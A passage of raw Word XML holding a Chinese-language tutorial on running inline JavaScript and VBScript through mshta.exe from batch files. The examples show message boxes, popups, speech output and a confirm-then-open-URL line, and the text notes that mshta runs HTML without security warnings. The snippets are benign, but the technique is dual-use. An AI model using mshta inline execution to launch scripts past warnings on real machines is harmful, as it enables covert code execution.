                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>,true);}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CC4E1B" w:rsidRDefault="00CC4E1B" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="525" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="新細明體" w:hAnsi="Microsoft YaHei" w:cs="新細明體"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00CC4E1B" w:rsidRDefault="00CC4E1B" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="double" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="525" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="新細明體" w:hAnsi="Microsoft YaHei" w:cs="新細明體"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC4E1B" w:rsidRPr="00D732AB" w:rsidRDefault="00CC4E1B" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="525" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="新細明體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="36"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>更新時間：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2020</w:t>
      </w:r>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>05</w:t>
      </w:r>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 19:17:57   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>投稿：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mdxy-dxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF5FD"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333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333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>這篇文章主要介紹了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333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 w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>命令用法示例</w:t>
      </w:r>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>需要的朋友可以參考下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它支援命令列參數，可以接收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JS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VBS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的方法。看示例（在命令列下測試）：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/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>JS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F7FD"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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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vbscript:window</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.execScript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("alert('hello world!');","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javascript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")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/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VBS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F7FD"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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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javascript:window</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.execScript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("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msgBox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('hello world!'):window.close","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")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調用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VBS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，分別使用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MSGBOX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函數和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POPUP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方法：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="134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2908"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidTr="00D732AB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32AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12908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32AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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mshta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vbscript:msgbox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("</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>該幹活了，夥計</w:t>
            </w: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!",64,"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>提示</w:t>
            </w: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")(</w:t>
            </w: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window.close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 xml:space="preserve">) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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mshta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vbscript:CreateObject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("</w:t>
            </w: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Wscript.Shell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").popup("</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>該幹活了，夥計！</w:t>
            </w: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",7,"</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>提示</w:t>
            </w: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",64)(</w:t>
            </w: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window.close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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>execute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方法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一條語句連續彈二個資訊框：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F7FD"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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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vbscript:execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>("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msgbox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""one BOX"":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msgbox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""two BOX"":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window.close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")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/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LZ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他們弄的，調用系統的英文閱讀：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F7FD"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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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vbscript:createobject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>("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sapi.spvoice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").speak("Good luck")(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window.close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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="5" w:color="CAE0F3"/>
          <w:left w:val="single" w:sz="18" w:space="8" w:color="49A7EA"/>
          <w:bottom w:val="single" w:sz="6" w:space="5" w:color="CAE0F3"/>
          <w:right w:val="single" w:sz="6" w:space="8" w:color="CAE0F3"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F7FD"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="150" w:after="120" w:line="480" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D5A96"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D5A96"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D5A96"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>麵</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D5A96"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是其他網友的補充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lastRenderedPageBreak/>
        <w:t>今天在一個批次處理裡看到一條命令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，感興趣的可以搜索一下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“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批次處理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”</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="216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"/>
        <w:gridCol w:w="21247"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidTr="00D732AB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32AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160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32AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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echo</w:t>
            </w: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 xml:space="preserve"> </w:t>
            </w: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off</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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 xml:space="preserve">start </w:t>
            </w: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mshta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javascript:if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(confirm("</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>將連接網站檢測您是否安裝了</w:t>
            </w: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.net 2.0</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>運行庫，是否繼續？該操作將不影響安裝程式的運行！</w:t>
            </w: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\r\n</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>如果您確信已安裝相應</w:t>
            </w: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.net</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>元件，請按取消，否則請按確定！</w:t>
            </w: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"))</w:t>
            </w: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window.open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 xml:space="preserve">(" </w:t>
            </w:r>
            <w:hyperlink r:id="rId6" w:history="1">
              <w:r w:rsidRPr="00D732AB">
                <w:rPr>
                  <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體"/>
                  <w:color w:val="428BCA"/>
                  <w:kern w:val="0"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="single"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>http://www.test.com/test.aspx</w:t>
              </w:r>
            </w:hyperlink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");window.close();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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在百度查詢了一下，原來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mshta.exe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是微軟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Windows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作業系統相關程式，用於執行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.HTA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檔，或在批次處理中結合其他語言的代碼；如：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javascript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，可用於運行一個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HTML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網頁而不會出現安全警告。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b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下面是摘錄內容：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以下用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js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表示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javascript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，用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表示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vbscript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一般應用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代碼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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F7FD"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//www.jb51.net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js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與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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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有時，可以在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bat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中調用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js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或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來實現一定的功能。</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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如彈出</w:t>
      </w:r>
      <w:proofErr w:type="gram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對話方塊：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代碼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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F7FD"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"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vbscript:msgbox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("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內容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",0,"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標題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") &amp; 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window.close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"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但是，並非所有的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js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和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命令都能通過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運行，比如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wscript.sleep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就不能。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代碼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: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rem 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以下代碼是錯誤的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F7FD"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"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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vbscript:wscript</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D732AB">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="新細明體" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.sleep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(1000) &amp; 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window.close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"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可見，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調用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js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或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也是有條件的。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b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基本規則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※</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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所引用的命令必須相當於一個數值或變數。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這句話是什麼意思呢？學過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的朋友都知道，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中彈出對話方塊的命令是：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代碼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:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F1F7FD"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msgbox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內容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",0,"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標題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lastRenderedPageBreak/>
        <w:t>但是，如果在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bat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中運行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"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msgbox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內容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",0,"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標題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，就會出現錯誤。這是因為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msgbox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內容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",0,"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標題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並不相當於一個數值或變數，而是相當於一個語句。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如果還沒有理解，就請看下面的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：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代碼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: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1463"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidTr="00D732AB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32AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>5</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>6</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="130"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>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11463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32AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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a=1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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b=2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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c=</w:t>
            </w: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</w:p>
          <w:p w:rsidR="00D732AB" w:rsidRPr="00D732AB" w:rsidRDefault="00D732AB" w:rsidP="00D732AB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing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msgbox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 xml:space="preserve"> "</w:t>
            </w:r>
            <w:r w:rsidRPr="00D732AB">
              <w:rPr>
                <w:rFonts w:ascii="細明體" w:eastAsia="細明體" w:hAnsi="細明體" w:cs="細明體" w:hint="eastAsia"/>
                <w:color w:val="9FB8CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>內容</w:t>
            </w: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"</w:t>
            </w:r>
